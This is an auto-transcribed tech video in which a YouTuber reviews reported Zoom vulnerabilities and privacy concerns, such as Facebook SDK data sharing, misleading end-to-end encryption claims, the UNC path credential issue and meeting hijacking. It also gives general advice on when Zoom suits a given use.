 Tom here for more systems what you need to know about the latest zoom vulnerabilities Don't worry There's not that many of them right now as of April 7th who knows I can't predict the future But at least we'll cover what I know right now and talk about the zoom product If you want to learn more about being my company head over to laurance systems comm if you'd like to hire short project There's a hires button up at the top. You want support this channel in other ways There's some affiliate links down below to get you deals and discounts on products and services we talk about on this channel And we'll start with this headline the first one is zoom leaking data So rapid seven put this up and I kind of like how they worded this the gossip the reporting and what happened I'm not going to read the entirety of this bummer run over the big ones zoom leaking data to Facebook They use a software development kit from Facebook They did stop using it But that's SDK did send some data to Facebook even when you weren't using Facebook because the login with Facebook feature Would pull some data and they were going to probably pull whether or not you were logged into Facebook already So they could just use your OAuth token and verify it etc It didn't seem like that big of a deal. I don't consider zoom a privacy-based application, but they did fix it Zoom and end an encryption. Okay, and then encryption what I think it means and what people in marketing think it means it's a great Comfort feeling to think that we're end-to-end encrypted I think an encryption means from my device to the person. I'm speaking with device Their marketing team thinks and encryption means from their device to their server and they do encrypt it from the device My device here what I'm recording on to their servers that it can be decrypted at the zoom level So the zoom servers have access to your data and they encrypted again before it goes to the other person So nobody in between not my ISP or any other computers local to my network are able to decrypt the data easily You know because it seems to be pretty strong encryption. We'll get to that down below But for the most part yes zoom themselves can decrypt it. So take that for what it's worth That's one more step in the path This one was kind of a minor one, but it got fixed but it's worth noting. What about these UNC pass and problems with it? Well, yeah zoom lets attacker steal password and window credentials great headline I did tweet it out and I think it's relevant, but it was fixed relatively quickly And it's just basically they weren't sanitizing the inputs For things you could dump in there and you could possibly exploit UNC pass not gonna dive too deep into the technical details of it But because it's fixed anyways, but you can read it in this blog post This was just silly zoom in the OS X interface. Yes, they did some strange things Including the dialogue box. It says system needs your privilege to change instead of saying something like zoom needs your password to update the application Yes, that's weird in terms of wording Perhaps someone who doesn't speak native English wrote that or some developer thought that was a funny way to word it I don't know the details But you know this is little things that they did fix the other thing they did was they said well They're using UX hacks to get access to the webcam. No, they're trying to get as few clicks as possible So end users don't drive them crazy with support calls Trust me. I get this from someone who's dealt with a lot of end users support So was it the best choice to do these UX hacks per se that are used by well less savory applications? Probably not the best idea, but it also removes some of the tech support from it So they didn't have malicious intent even though they had a way of doing it that seemed malicious And this just gave permission to the webcam easier Well, because no one wants a phone call about how do I get my webcam working with zoom and creating all the technical support challenge of that These local privilege escalations which have been fixed relatively fast. This was kind of weird I don't like the way they worded it. I don't like the way it was handled So X NSA hacker tell me everything starts with X NSA hacker. That's a great headline, right? But this person who is a truly good security researcher He's covered some findings and dropped them over on Objective C which is a blog but by dropping them didn't appear to contact zoom according to the rapid seven research They did here. Those have been fixed, but they were basically some Different ways zoom handle things and not the best way So it was a potential problem for people also running on your computer and taking over by using some of the privilege Tools inside of zoom, but they still had access to have to have access to your computer make this happen Zoom China encryption and more snafu's back to what I said about zoom not being truly and then encrypted That means it pit stops at the zoom server level and they're able to decode it there And what about China? This was a popular comment on my other zoom video Yes, they have servers that they do some development in China the servers I pointed out in my video were here in the US, but either way whether it's us or China China has their own government with different policies and we have policies here for FISA warrants and subpoenas Because it's not and and encrypted. Yes, they're subject to the laws of the land by which they reside so what that means is if you have a Something you're worried about state level secrets that you have to work in because you are a security contractor Whichever, you know some government title you may have zoom may not be the best thing for you to use if you're worried about such things Whether you're a European user whether or not you're an American user Please note it is subject to not only like the FISA warrants here in the US with subpoenas and FBI and other US agencies Any other nation-state that cooperates directly with the US? So if there's some others thing operations going on and they are cooperating with the FBI The FBI could because of the laws of the land here where many of the service provide also gain access to it Anytime you're not using an encryption This is just something you need to think about Maybe this doesn't matter if you're just doing your zoom happy hour and doing a toast to your friends It's probably great if you're working on something of national security levels And you want to have that discussion zoom's probably not the thing to do that with if you have lots of company trade secrets And you're worried about spying by third-party companies that may steal those secrets. Don't you zoom? That's probably not a good idea. So if you Are wanting to really lock that down in your business running your own servers for messaging makes a lot more sense I know someone a comment zoom has some commercial stuff available. I've also talked to before I mentioned this in another video Jitsie Chris from cross talk just did a video on how to get that stood up If you want something where you are in control Then go ahead set something up where you're in control and the servers don't rely on these third parties And that's how you get around some of that where you go I don't want someone pit-stopping on the server or listening in on it because the reality the other side of this if Any bad actors get a hold of zoom servers and get within their system All the information will become public as well So that's a something else think about it and there's a few other Posts on here and few other details, but nothing really relevant from that So it's just some more headline debunking so does baking giving you the real details behind there So my overall opinion as long as you're not trying to do something of national security level Or require state secrets or have some top-secret information to share or Proprietary secrets that you worry some other country could potentially tap into if you're not any of those categories Then zooms okay to use it's probably really good for end-user and things like that There's been a lot of other talk about a few things that aren't exactly vulnerabilities But where they found recordings of zoom or people jumping and zoom meetings zoom has done a great job of updating all the defaults to Help mitigate some of those problems because not putting passwords on zooms and only having a Short number of digits that people could guess obviously creates a problem and people just jumping into your Conferencing call unannounced and maybe not for the best reasons because well You know jumping in on someone's phone call to insert something else is funny to many people that do things for the lulls So those things should be looked at you should take the time to look at how to secure zoom It's really easy to do and most of the faults have been updated Since the last video I did to include most of those security default So zooms come a lot way for that and as far as like finding these videos Yes, you can see the little button when people are recording the video and people are accidentally leaving these open publishing them the dropbox Publishing them to different cloud hosting without any security There's also always the chance though when you have a group conference call going that someone's simply recording the screen and Eventually could that data can get out as well. So those are all things to consider when you're you know using any of these tools So always be conscious of it. I always kind of comment in my thought processes If I'm having a conversation on a platform like zoom, I think of it of a conversation at the park I don't see anyone next to me really listening with that person on the bench over there might be listening So I come at it from that perspective I think about that and very conscious about what I'd say on there And if I really want to have a private conversation off the record You have to use something that's using an encryption if you really want to lock it down Which is a lot harder but zoom makes it a lot easier So you're gonna see a lot of average end users using it And if you just want to you know do webinars and talk about security and things like that and have general conversations with people Which I have had on zoom a lot and a lot of the podcasts. I've done and a lot of the Interviews I've done have been on zoom I think it's a great tool for things like that especially because most of that information ends up public anyways So I'm not saying not to use it. I'm saying think about the use case to use it Also, if you're a hundred percent privacy oriented and don't want to be tracked online or anything like that And zoom may not be for you either yes They're gonna try to collect data about you giving them the middle amount of data is gonna be the best solution for that But you know use everything with caution keep an open mind when all of it And I'll leave this link to rapid seven so you can dive into all the details. Thanks And thank you for making it to the end of the video if you like this video Please give it a thumbs up if you'd like to see more content from the channel hit the subscribe button and hit the Bell icon if you like YouTube to notify you when new videos come out If you'd like to hire us head over to Lawrence systems calm fill out our contact page and Let us know what we can help you with and what projects you'd like us to work together on If you want to carry on the discussion head over to forums that Lawrence systems calm where we can carry on the discussion about this video Other videos or other tech topics in general even suggestions for new videos. They're accepted right there on our forums Which are free also if you like to help the channel in other ways head over to our affiliate page We have a lot of great tech offers for you and once again Thanks for watching and see you next time